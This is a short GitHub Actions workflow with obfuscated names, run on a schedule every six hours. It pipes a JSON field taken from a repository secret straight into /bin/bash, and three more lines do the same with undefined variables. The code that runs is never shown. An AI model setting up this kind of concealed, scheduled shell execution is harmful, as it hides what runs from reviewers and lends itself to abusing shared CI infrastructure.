name: yibaizhongya
on:
  workflow_dispatch:
  schedule:
    - cron: '52 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yibaizhongya
        env:
          e94: ${{ secrets.e94 }}
        run: |
          echo $e94 | jq -r .z5065 | /bin/bash
          echo $mxwg4 | jq -r .x5 | /bin/bash
          echo $rueq2565 | jq -r .j00 | /bin/bash
          echo $jr41 | jq -r .w70450 | /bin/bash

